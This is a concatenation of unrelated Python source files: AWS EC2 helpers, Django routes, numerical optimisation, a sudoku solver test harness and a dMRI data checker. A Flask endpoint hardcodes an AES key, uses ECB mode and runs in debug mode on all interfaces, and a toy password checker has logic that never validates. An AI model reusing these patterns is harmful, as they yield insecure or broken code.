Appends one path to the end of another
"""
wide = func_name.endswith(u"W")
path_ptr, more_ptr = func_args
curr_path = cpu_context.memory.read_string(path_ptr, wide=wide)
more_path = cpu_context.memory.read_string(more_ptr, wide=wide)
full_path = ntpath.join(curr_path, more_path)
cpu_context.memory.write_string(path_ptr, full_path, wide=wide)
return True
@builtin_func("PathAddBackslashA")
@builtin_func("PathAddBackslashW")
#typedef(LPWSTR PathAddBackslashW(LPWSTR pszPath));)
def pathaddbackslash(cpu_context, func_name, func_args):
"""
Appends a backslash to the path
"""
wide = func_name.endswith(u"W")
path_ptr = func_args[0]
curr_path = cpu_context.memory.read_string(path_ptr, wide=wide)
full_path = curr_path + "\\"
cpu_context.memory.write_string(path_ptr, full_path, wide=wide)
return True
| 1,242 | 451 |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('info', views.info, name='info'),
path('chart', views.charts, name='chart'),
path('trialbalance', views.trialbalance, name='trialbalance'),
path('ledger', views.ledger, name='ledger'),
path('balancesheet', views.balancesheet, name='balancesheet'),
path('incomestatement', views.incomestatement, name='incomestatement'),
path('journalize', views.journalize, name='journalize'),
path('sign_up/', views.sign_up, name='sign_up'),
path("insertaccount", views.insertaccount, name='insertaccount'),
path("inserjournal", views.inserjournal, name='inserjournal'),
path("register", views.signupform, name='register'),
path("login", views.loginForm, name='login'),
path("logout", views.logusout, name='logout'),
path("log_in", views.log_me_in, name='log_in'),
path("journal_list", views.journalList, name='journal_list'),
path("journal_control",views.journalControls,name='journalControls')
] | 1,057 | 343 |
from .smores import Smores, AutocompleteResponse, TemplateString, TemplateFile, Schema, Nested
__all__ = ['Smores', 'AutocompleteResponse', 'TemplateString', 'TemplateFile', 'Schema', 'Nested']
| 194 | 54 |
"""
IcsEc2: Library for EC2
-----------------------
+--------------------+------------+--+
| This is the IcsEc2 common library. |
+--------------------+------------+--+
"""
from operator import attrgetter
from time import time, mktime, sleep, gmtime, strftime, strptime
from boto.ec2 import get_region
from boto.ec2.connection import EC2Connection
from boto.vpc import connect_to_region as vpc_connect_to_region
from opslib.icsexception import IcsEc2Exception
import logging
log = logging.getLogger(__name__)
class IcsEc2(EC2Connection):
"""
ICS Library for EC2
"""
def __init__(self, region, **kwargs):
super(IcsEc2, self).__init__(
region=get_region(region), **kwargs)
def get_instance_attribute(self, instance_id, attr_name):
"""
Get the attribute value of an instance.
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:type attr_name: string
:param attr_name: the name of the instance attribute,
details shown as below:
:ivar id: The unique ID of the Instance.
:ivar groups: A list of Group objects representing the security
groups associated with the instance.
:ivar public_dns_name: The public dns name of the instance.
:ivar private_dns_name: The private dns name of the instance.
:ivar state: The string representation of the instance's current state.
:ivar state_code: An integer representation of the instance's
current state.
:ivar previous_state: The string representation of the instance's
previous state.
:ivar previous_state_code: An integer representation of the
instance's current state.
:ivar key_name: The name of the SSH key associated with the instance.
:ivar instance_type: The type of instance (e.g. m1.small).
:ivar launch_time: The time the instance was launched.
:ivar image_id: The ID of the AMI used to launch this instance.
:ivar placement: The availability zone in which the instance is
running.
:ivar placement_group: The name of the placement group the instance
is in (for cluster compute instances).
:ivar placement_tenancy: The tenancy of the instance, if the instance
is running within a VPC. An instance with a tenancy of dedicated
runs on a single-tenant hardware.
:ivar kernel: The kernel associated with the instance.
:ivar ramdisk: The ramdisk associated with the instance.
:ivar architecture: The architecture of the image (i386|x86_64).
:ivar hypervisor: The hypervisor used.
:ivar virtualization_type: The type of virtualization used.
:ivar product_codes: A list of product codes associated with
this instance.
:ivar ami_launch_index: This instances position within
it's launch group.
:ivar monitored: A boolean indicating whether monitoring is
enabled or not.
:ivar monitoring_state: A string value that contains the actual value
of the monitoring element returned by EC2.
:ivar spot_instance_request_id: The ID of the spot instance request
if this is a spot instance.
:ivar subnet_id: The VPC Subnet ID, if running in VPC.
:ivar vpc_id: The VPC ID, if running in VPC.
:ivar private_ip_address: The private IP address of the instance.
:ivar ip_address: The public IP address of the instance.
:ivar platform: Platform of the instance (e.g. Windows)
:ivar root_device_name: The name of the root device.
:ivar root_device_type: The root device type (ebs|instance-store).
:ivar block_device_mapping: The Block Device Mapping for the instance.
:ivar state_reason: The reason for the most recent state transition.
:ivar groups: List of security Groups associated with the instance.
:ivar interfaces: List of Elastic Network Interfaces associated with
this instance.
:ivar ebs_optimized: Whether instance is using optimized EBS volumes
or not.
:ivar instance_profile: A Python dict containing the instance
profile id and arn associated with this instance.
"""
if not isinstance(instance_id, basestring):
raise IcsEc2Exception(
"instance_id should be a 'str' not %s" % type(instance_id))
if not isinstance(attr_name, basestring):
raise IcsEc2Exception(
"attr_name should be a 'str' not %s" % type(attr_name))
resource = self.get_all_instances(instance_ids=instance_id)[0]
instance = resource.instances[0]
return attrgetter(attr_name)(instance)
def get_public_address(self, instance_id):
"""
Get the public IPv4 address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the public IPv4 address
"""
return self.get_instance_attribute(instance_id, "ip_address")
def get_private_address(self, instance_id):
"""
Get the private IPv4 address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the private IPv4 address
"""
return self.get_instance_attribute(instance_id, "private_ip_address")
def get_public_dns(self, instance_id):
"""
Get the public dns address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the public dns address
"""
return self.get_instance_attribute(instance_id, "public_dns_name")
def get_private_dns(self, instance_id):
"""
Get the private dns address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the private IPv4 address
"""
return self.get_instance_attribute(instance_id,
"private_dns_name")
def get_instance_tags(self, instance_id):
"""
Get tags of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: dict
:return: a dictionary containing the tags of this instance
"""
tags = self.get_all_tags(filters={"resource-id": instance_id})
ret = {}
for tag in tags:
ret.update({tag.name: tag.value})
return ret
def add_instance_tags(self, instance_id, tags):
"""
Add tags to the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
"""
return self.create_tags(instance_id, tags)
def del_instance_tags(self, instance_id, tags):
"""
Remove tags of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
"""
return self.delete_tags(instance_id, tags)
def get_eips_from_addr(self, eip_list):
"""
Get EIP objects via the list of EIP addresses
:type eip_list: list
:param eip_list: the list of EIP addresses
:rtype: class
:return: EIP objects in boto
"""
return self.get_all_addresses(
filters={'public-ip': eip_list})
def get_eips_from_instance(self, instance_id):
"""
Get EIP objects via the instance id
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: class
:return: EIP objects in boto
"""
return self.get_all_addresses(
filters={'instance-id': instance_id})
def get_instance_event(self, instance_id):
"""
Get the event of the specified instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
"""
result = self.get_all_instance_status(
instance_ids=instance_id)
return result[0].events
def get_instance_status(self, instance_id):
"""
Get the instance status and system status
of the specified instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: tuple
:return: a tuple contains (instance_status, system_status)
"""
inst_status = self.get_all_instance_status(
instance_ids=instance_id)
return (inst_status[0].instance_status.status,
inst_status[0].system_status.status)
def is_instance_healthy(self, instance_id):
"""
check the health of the specified instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: boolean
:return: True/False
"""
result = self.get_instance_status(instance_id)
if result[0].lower() == "ok" and result[1].lower() == "ok":
return True
else:
return False
def is_eip_free(self, eip):
"""
check the availability of the specified EIP address: free or not
:type eip: string
:param eip: one EIP address
:rtype: tuple
:return: (True/False, EIP object/None)
"""
eip_ops = self.get_eips_from_addr(eip)
if not eip_ops:
return (False, None)
eip_op = eip_ops[0]
if eip_op.public_ip != eip:
raise IcsEc2Exception(
"the real eip address %s is not equal to the expected one %s"
% (eip_op.public_ip, eip))
if eip_op.instance_id:
return (False, eip_op)
else:
return (True, eip_op)
def bind_eip(self, eip, instance_id):
"""
Bind EIP address to the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: bool
:return: success or raise IcsEc2Exception
"""
if isinstance(eip, list):
raise IcsEc2Exception(
"cannot associate multiple eips '%s' to one instance '%s'"
% (eip, instance_id))
result, eipop = self.is_eip_free(eip)
if result:
log.info("the eip address " +
"'%s' will be associated " % eip +
"with this instance '%s'"
% instance_id)
if eipop.domain == "vpc":
self.associate_address(
instance_id=instance_id, allocation_id=eipop.allocation_id)
else:
eipop.associate(instance_id=instance_id)
elif eipop.instance_id != instance_id:
log.warning(
"this eip '%s' has been associated with another '%s'"
% (eip, eipop.instance_id))
return False
else:
log.info("the eip address " +
"'%s' has been associated " % eip +
"with this instance '%s'"
% instance_id)
return True
result, eipop = self.is_eip_free(eip)
return not result and eipop.instance_id == instance_id
def free_eip(self, eip, instance_id):
"""
Free EIP address to the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: bool
:return: success or raise IcsEc2Exception
"""
if isinstance(eip, list):
raise IcsEc2Exception(
"cannot free multiple eips '%s' to one instance '%s'"
% (eip, instance_id))
result, eipop = self.is_eip_free(eip)
if result:
log.warning("this eip '%s' is not associated with '%s'"
% (eip, instance_id))
return True
elif eipop.instance_id != instance_id:
log.warning(
"this eip '%s' has been associated with another '%s'"
% (eip, eipop.instance_id))
return True
log.info("the eip address " +
"'%s' will be disassociated with this instance '%s'"
% (eip, instance_id))
eipop.disassociate()
return self.is_eip_free(eip)[0]
def get_volumes_by_instance(self, instance_id, device_name=None):
"""
Get boto Volume Objects by instance Id or device name
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:type device_name: string
:param device_name: device name like '/dev/sdf'
:rtype: list
:return: list of boto volume objects
"""
if device_name is None:
filters = {'attachment.instance-id': instance_id}
else:
filters = {'attachment.instance-id': instance_id,
'attachment.device': device_name}
return self.get_all_volumes(filters=filters)
def take_snapshot(self, volume_id, description=None, tags=None):
"""
Take a snapshot to existing volume with specific tags
:type volume_id: string
:param volume_id: EC2 volume id startwith 'vol-xxxxxxx'
:type description: string
:param description: words to describe the usage of this snapshot
:type tags: dict
:param tags: snapshot tags like {'Name': 'XXX'}
:rtype: class
:return: boto snapshot object
"""
if tags is None:
tags = {}
snapshot = self.create_snapshot(volume_id, description)
tags.update({'VolumeId': volume_id})
timestamp = strftime("%Y%m%d-%H%M", gmtime())
tags.update({'Timestamp': timestamp})
for name, value in tags.iteritems():
if not name.startswith('tag:'):
name = name.replace('_', '-')
else:
name = name.replace('tag:', '')
snapshot.add_tag(name, value)
return snapshot
@staticmethod
def format_tags(tags):
"""
Convert {"Name": "XXX"} to {"tag:Name": "XXX"}
"""
new_tags = {}
for name, value in tags.iteritems():
if not name.startswith('tag:'):
name = 'tag:'.join(["", name])
new_tags[name] = value
return new_tags
def find_snapshot_by_tags(self, tags):
"""
Find a snapshot by specific tags
:type tags: dict
:param tags: snapshot tags like {'Name': 'XXX'}
:rtype: list
:return: list of boto snapshot objects
"""
tags = self.format_tags(tags)
# FIXME: only used for Cassandra
if 'tag:Timestamp' in tags and tags['tag:Timestamp'] == '0':
refined_tags = {}
refined_tags['tag:Role'] = tags['tag:Role']
refined_tags['tag:Timestamp'] = tags['tag:Timestamp']
tags = refined_tags
if 'tag:Timestamp' in tags and \
tags['tag:Timestamp'].lower() == 'latest':
tags.pop('tag:Timestamp')
snapshots = self.get_all_snapshots(filters=self.format_tags(tags))
if snapshots:
return self.fetch_latest_snapshot(snapshots)
else:
return None
return self.get_all_snapshots(filters=self.format_tags(tags))
def fetch_latest_snapshot(self, snapshots):
"""
Find the latest Snapshot
"""
timestamps = [snapshot.tags['Timestamp'] for snapshot in snapshots]
return snapshots[timestamps.index(max(timestamps))]
def fetch_snapid_by_tags(self, **tags):
"""
Find the Snapshot Id by specific tags
:type tags: dict
:param tags: snapshot tags like {'Name': 'XXX'}
:rtype: string
:return: Snapshot Id
"""
# FIXME: if tag:Timestamp == latest, then flag = True
flag = False
tags = self.format_tags(tags)
# FIXME: hard-coded string in tags
if 'tag:Timestamp' in tags and \
tags['tag:Timestamp'].lower() == 'latest':
del tags['tag:Timestamp']
flag = True
snapshots = self.find_snapshot_by_tags(tags)
if not snapshots:
return None
elif len(snapshots) > 1:
# FIXME: hard-coded string in tags
if not flag:
return None
snapshot = self.fetch_latest_snapshot(snapshots)
if not snapshot:
return None
else:
return snapshot.id
else:
return snapshots[0].id
def clean_snapshots(self, tags, duration):
"""
Clean up snapshots by specific tags and duration
:type tags: dict
:param tags: snapshot tags like
.. code-block:: javascript
{
"Name": "XXX"
}
:type duration: int
:param duration: seconds
:rtype: list
:return: list of cleaned snapshot ids
"""
snapshots = self.find_snapshot_by_tags(self.format_tags(tags))
deleted_ids = []
for snapshot in snapshots:
if 'Timestamp' in snapshot.tags:
try:
tmp_time = strptime(snapshot.tags[
'Timestamp'], "%Y%m%d-%H%M")
timestamp = mktime(tmp_time)
except Exception, e:
log.error(e)
continue
now = mktime(gmtime())
if now - timestamp > duration:
deleted_ids.append(snapshot.id)
self.del_snapshot(snapshot.id)
return deleted_ids
def del_snapshot(self, snapshot_id):
"""
Delete snapshots by snapshot_id
:type snapshot_id: string
:param snapshot_id: snapshot Id like 'snap-xxxxxx'
:rtype: boolean
:return: true, false, exception
"""
return self.delete_snapshot(snapshot_id)
def find_ami_by_tags(self, tags):
"""
Find AMI by specific tags
:type tags: dict
:param tags: AMI tags like {'Name': 'XXX'}
:rtype: list
:return: list of boto image objects
"""
return self.get_all_images(filters=self.format_tags(tags))
def fetch_imageid_by_tags(self, **tags):
"""
Fetch the Image Id by specific tags
:type tags: dict
:param tags: AMI tags like {'Name': 'XXX'}
:rtype: string
:return: Image Id
"""
images = self.find_ami_by_tags(self.format_tags(tags))
if not images:
return None
elif len(images) > 1:
return None
else:
return images[0].id
def get_all_zones(self, zones=None):
"""
Get all Availability Zones under this region
:type zones: list
:param zones: specified zone list
:rtype: list
:return: list of availability zones in this region
"""
if zones is not None and isinstance(zones, list):
return zones
else:
return [zone.name for zone in super(IcsEc2, self).get_all_zones()]
def size_of_all_zones(self, zones=None):
"""
Get the number of all Availability Zones under this region
:type zones: list
:param zones: specified zone list
:rtype: int
:return: number of availability zones in this region
"""
zone_list = self.get_all_zones(zones)
if zone_list:
return len(zone_list)
else:
return 0
def get_sgroup(self, name, vpc_id=None):
"""
Get Security Group Name (if Ec2) / Id (if Vpc)
:param name: security group name
:type name: string
:param vpc_id: vpc id
:type vpc_id: string
:rtype: string
:return: security group id
"""
if vpc_id is None:
return name
else:
filters = {'vpc-id': vpc_id, 'group-name': name}
group = self.get_all_security_groups(filters=filters)
if group and isinstance(group, list):
return group[0].id
else:
return None
def get_security_group_id(self, name, vpc_id=None):
"""
Get security group id
:param name: security group name
:type name: string
:param vpc_id: vpc id
:type vpc_id: string
:rtype: string
:return: security group id
"""
if vpc_id:
filters = {'vpc-id': vpc_id, 'group-name': name}
else:
filters = {'group-name': name}
group = self.get_all_security_groups(filters=filters)
if group:
return group[0].id
else:
return None
def get_az_from_subnet_id(self, subnet_id=None, zones=None):
"""
Get the name of Availability Zone by its Subnet Id
:type zones: list
:param zones: specified zone list
:type subnet_id: string or comma-seperated list of string
:param subnet_id: subnet id
:rtype: list
:return: a list of availability zone names
"""
if subnet_id is None:
return self.get_all_zones(zones)
vpc = vpc_connect_to_region(self.region.name)
if isinstance(subnet_id, basestring):
subnet_ids = subnet_id.lstrip().rstrip().split(",")
else:
return None
zones = []
for sid in subnet_ids:
subnets = vpc.get_all_subnets(sid)
if subnets and isinstance(subnets, list):
zones.append(subnets[0].availability_zone)
return zones
def get_zone_name_for_cassandra(self, index, zones=None):
"""
Get the name of Availability Zone for Cassandra
:type zones: list
:param zones: specified zone list
:type index: int
:param index: the index of cassandra instance
:rtype: string
:return: zone name like "us-west-2a"
"""
zone_list = self.get_all_zones(zones)
zone_size = self.size_of_all_zones(zones)
return zone_list[(int(index) - 1) % zone_size]
def get_zone_index_for_cassandra(self, index, zones=None):
"""
Get the index of Availability Zone for Cassandra
:type zones: list
:param zones: specified zone list
:type index: int
:param index: the index of cassandra instance
:rtype: string
:return: zone index like "1"
"""
zone_size = self.size_of_all_zones(zones)
return str((int(index) - 1) / zone_size + 1)
def get_zone_suffix_for_cassandra(self, index, zones=None):
"""
Get the suffix of Availability Zone for Cassandra
:type zones: list
:param zones: specified zone list
:type index: int
:param index: the index of cassandra instance
:rtype: string
:return: zone suffix like "a-1"
"""
return "-".join([self.get_zone_name_for_cassandra(index, zones)[-1],
self.get_zone_index_for_cassandra(index, zones)])
# vim: tabstop=4 shiftwidth=4 softtabstop=4
| 23,795 | 6,782 |
# Pair Programming
passphrase = "Megmo" and "megmo"
null1 = "123"
null2 = "letmein"
null3 = "password"
while True:
password = str(input("Please enter password: "))
if null3 in password:
print("Incorrect | Password has password inside")
if null2 in password:
print("Incorrect | password has letmein")
if null1 in password:
print("Incorrect | Password has 123")
if passphrase in password and not null1 and not null2 and not null3:
print("Correct | Password validated")
break
| 540 | 171 |
from sqlalchemy import create_engine
from pywky.db.models import Base
engine = create_engine('sqlite:///worky_dev.db')
Base.metadata.bind = engine
| 149 | 49 |
# -*- coding:utf-8 -*-
from __future__ import division
import numpy as np
import os
import math
import pickle as Pickle
import pynlpir
import random
from math import log
from numpy import linalg as LA
def F(rhoM, proDict):
# print rhoM
res = 0
for pm in proDict:
P = np.trace(np.dot(proDict[pm][1], rhoM))
res += proDict[pm][0] * log(P)
# print('value of target F function = {}'.format(res))
return res
def Grad_F(rhoM, proDict, dim):
res = np.zeros((dim, dim))
for pm in proDict:
trace_val = np.trace(np.dot(proDict[pm][1], rhoM))
res += (proDict[pm][0] * proDict[pm][1] / trace_val)
return res
def rho_bar(rhoM, proDict, dim):
grad_f = Grad_F(rhoM, proDict, dim)
res = (np.dot(grad_f,rhoM) + np.dot(rhoM,grad_f))/2
return res
def rho_tilde(rhoM, proDict, dim):
grad_f = Grad_F(rhoM, proDict, dim)
grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f)
res = grad_rho_grad/np.trace(grad_rho_grad)
return res
def D_bar(rhoM, proDict, dim):
return(rho_bar(rhoM, proDict,dim)-rhoM)
def D_tilde(rhoM, proDict, dim):
return(rho_tilde(rhoM, proDict,dim)-rhoM)
def q_t(t, rhoM, proDict, dim):
grad_f = Grad_F(rhoM, proDict, dim)
grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f)
res = 1+2*t+t*t*np.trace(grad_rho_grad)
return res
def D(t, rhoM, proDict, dim): # 公式(19)
grad_f = Grad_F(rhoM, proDict, dim)
grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f)
d_bar = D_bar(rhoM, proDict, dim)
d_tilde = D_tilde(rhoM, proDict,dim)
q = q_t(t, rhoM, proDict, dim)
res = (2/q)*d_bar + (t*np.trace(grad_rho_grad)/q)*d_tilde
return res
def set_t(t):
return max(1, t)
def judgement(rhoM, proDict,f_old, dim, threshold_values = (1e-7, 1e-7, 1e-7)):
grad_f = Grad_F(rhoM, proDict, dim)
grad_rho_grad = np.dot(np.dot(grad_f, rhoM),grad_f)
grad_rho = np.dot(grad_f,rhoM)
diff = f_old - F(rhoM, proDict)
if(LA.norm(rhoM - grad_rho_grad)< threshold_values[0] and LA.norm(rhoM -grad_rho)< threshold_values[1] and abs(diff)< threshold_values[2]):
return False
else:
return True
def judge_t(t, d, rhoM, proDict, dim, iter_r):
# print 'please see here:'
f_new = F(rhoM + t * d, proDict)
f_old = F(rhoM, proDict)
diff = iter_r * t * np.trace(np.dot(Grad_F(rhoM, proDict,dim), d))
if(f_new == f_old):
return False
# print(f_new-f_old)
return(f_new <=f_old+diff)
def test_set_generator(proj_num,vector_dim):
dictionary = {}
for i in range(proj_num):
weight = np.random.random()
vector = np.random.rand(1,vector_dim)
vector = vector/(math.sqrt(np.dot(vector,np.transpose(vector))))
projector = np.outer(vector, vector) / np.inner(vector, vector)
dictionary['word_'+str(i)] = [weight, projector]
return dictionary | 2,680 | 1,221 |
#! /usr/bin/env python
from foodify import app
app.run(debug = True) | 69 | 26 |
"""This python script can be used to test the correctness and finiteness of the algorithms."""
from multiprocessing import Process
from BASolver2 import bASolve, bASolverHandle
from OPBASolver import OPSolverHandle
import time
# bASolve()
class NonFiniteException(Exception):
pass
def testcorrectness(algo):
""""Test the algorithm specified in <algo>
algo:
1: BA-Algorithm
2: OPBA-Algorithm
3: Algorithm X
The input will be passed to the algorithm directly
"""
if algo == 1:
return testBA()
elif algo == 2:
return testOPBA()
elif algo == 3:
return testAlgoX()
def locBASOLVE(grid):
print(bASolverHandle(grid))
# print(grid)
def testBA():
inputs = []
validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
inputs.append(validInput)
wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9
inputs.append(wrongdim)
# 8 is two times in a collomn at start, therfore unsolvable.
invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
inputs.append(invStart)
# 22 is not valid.
invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
inputs.append(invNumbers)
emptyinp = [[0 for _ in range(9)] for _ in range(9)]
inputs.append(emptyinp)
for inp in inputs:
proc = Process(target=locBASOLVE, args=[inp])
proc.start()
curtim = time.time()
proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds
if abs(curtim-time.time()) >10:
print("ERROR, took longer than 10 seconds. Stoped after 10 seconds")
raise NonFiniteException("The solver took more than 10 seconds.")
proc.terminate()
print("NEXT")
def testOP():
inputs = []
validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
inputs.append(validInput)
wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9
inputs.append(wrongdim)
# 8 is two times in a collomn at start, therfore unsolvable.
invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
inputs.append(invStart)
# 22 is not valid.
invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]]
inputs.append(invNumbers)
# Empty field:
emptyinp = [[0 for _ in range(9)] for _ in range(9)]
inputs.append(emptyinp)
for inp in inputs:
proc = Process(target=OPSolverHandle, args=[inp])
proc.start()
curtim = time.time()
proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds
if abs(curtim-time.time()) >10:
print("ERROR, took longer than 10 seconds. Stoped after 10 seconds")
raise NonFiniteException("The solver took more than 10 seconds.")
proc.terminate()
print("NEXT")
def testOPBA():
pass
def testAlgoX():
pass
if __name__ == "__main__":
testBA()
testOP()
testAlgoX()
# print(bASolverHandle([[0 for _ in range(9)] for _ in range(9)]))
| 4,400 | 2,437 |
from crypt import methods
from this import s
from flask import Flask, request, jsonify
import base64
import os
from Crypto.Cipher import AES
from urllib.parse import unquote
app = Flask(__name__)
secret = 'TESTTESTTESTTEST'
p_char = '%'
def unpad_str(msg):
msg = msg.decode('utf-8')
msg = msg.rstrip('%')
return msg
def decrypt_message(msg, key):
decoded_encrypted_msg = base64.b64decode(msg)
cipher = AES.new(key)
try:
decrypted_msg = cipher.decrypt(decoded_encrypted_msg)
except:
raise Exception('Error Decrypting')
else:
unpadded_private_msg = unpad_str(decrypted_msg)
return unpadded_private_msg
def decode_str(msg):
msg = msg.rstrip(p_char)
splitted = msg.split(':')
splitted_bev = splitted[4].split(';')
resp_dect = {}
resp_dect['id'] = int(float(splitted[0]))
resp_dect['name'] = splitted[1]
resp_dect['email'] = splitted[2]
resp_dect['emp_no'] = 'N/A' if (splitted[3] == '0.0') else splitted[3]
resp_dect['beverages'] = splitted_bev
resp_dect['food_preference'] = splitted[5]
return resp_dect
@app.route("/decrypt", methods=['GET'])
def decrypt():
args = request.args
encrypted_string = args.get('enc_str')
dec_str = ''
try:
dec_str = decrypt_message(encrypted_string, secret)
except:
return jsonify({'error': 'Invalid User!!'}), 400, {'ContentType': 'application/json'}
else:
processed_res = decode_str(dec_str)
return jsonify({'data': processed_res}), 200, {'ContentType': 'application/json'}
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
| 1,647 | 604 |
def greet(name):
print (f'Good morning, {name}')
# print (__name__)
if __name__ == '__main__':
n = input('Enter Your name: ')
greet(n)
| 155 | 64 |
print("wewcome to the tip cawcuwatow. >_<")
bill = float(input("What is the total bill?\n$"))
tip_percentage = float(input("What percentage tip will you like to give?\n"))
split_among = int(input("How many people to split the bill?\n"))
total_bill_with_tip = bill + (bill * tip_percentage / 100)
each_pay = round(total_bill_with_tip / split_among, 2)
print(f"Each person should pay: ${each_pay:.2f}")
| 404 | 154 |
#!/usr/bin/env python
# ===============================================================================
# dMRIharmonization (2018) pipeline is written by-
#
# TASHRIF BILLAH
# Brigham and Women's Hospital/Harvard Medical School
# tbillah@bwh.harvard.edu, tashrifbillah@gmail.com
#
# ===============================================================================
# See details at https://github.com/pnlbwh/dMRIharmonization
# Submit issues at https://github.com/pnlbwh/dMRIharmonization/issues
# View LICENSE at https://github.com/pnlbwh/dMRIharmonization/blob/master/LICENSE
# ===============================================================================
from conversion import read_bvals, read_imgs, read_imgs_masks
import numpy as np
from warnings import warn
from plumbum import local
from util import abspath, load, isfile, getpid
from findBshells import findBShells
import sys
def check_bshells(ref_imgs, ref_bvals):
unmatched=[]
for imgPath in ref_imgs:
imgPath= local.path(imgPath)
if not imgPath.exists():
FileNotFoundError(imgPath)
inPrefix = abspath(imgPath).split('.nii')[0]
bvals= findBShells(inPrefix+'.bval')
if (bvals==ref_bvals).all():
print('b-shells matched for', imgPath.name)
else:
print(f'\nUnmatched b-shells for {imgPath.name}')
print(bvals)
print(f'ref_bvals {ref_bvals}\n')
unmatched.append(imgPath._path)
print('')
if len(unmatched):
print('Unmatched cases:')
print(unmatched)
raise ValueError('Leave out the unmatched cases or change the reference case for determining b-shell to run multi-shell-dMRIharmonization')
else:
print('All cases have same b-shells. Data is good for running multi-shell-dMRIharmonization')
print('')
def check_resolution(ref_imgs, ref_res):
unmatched = []
for imgPath in ref_imgs:
imgPath= local.path(imgPath)
if not imgPath.exists():
FileNotFoundError(imgPath)
res= load(imgPath._path).header['pixdim'][1:4]
if (res-ref_res).sum()<=10e-6:
print('spatial resolution matched for', imgPath.name)
else:
print(f'\nUnmatched spatial resolution for {imgPath.name}')
print(res)
print(f'ref_res {ref_res}\n')
unmatched.append(imgPath._path)
print('')
if len(unmatched):
print('Unmatched cases:')
print(unmatched)
raise ValueError('Leave out the unmatched cases or change the reference case for determining spatial resolution to run multi-shell-dMRIharmonization')
else:
print('All cases have same spatial resolution. Data is good for running multi-shell-dMRIharmonization')
print('')
def consistencyCheck(ref_csv, outputBshellFile= None, outPutResolutionFile= None):
try:
ref_imgs, _ = read_imgs_masks(ref_csv)
except:
ref_imgs = read_imgs(ref_csv)
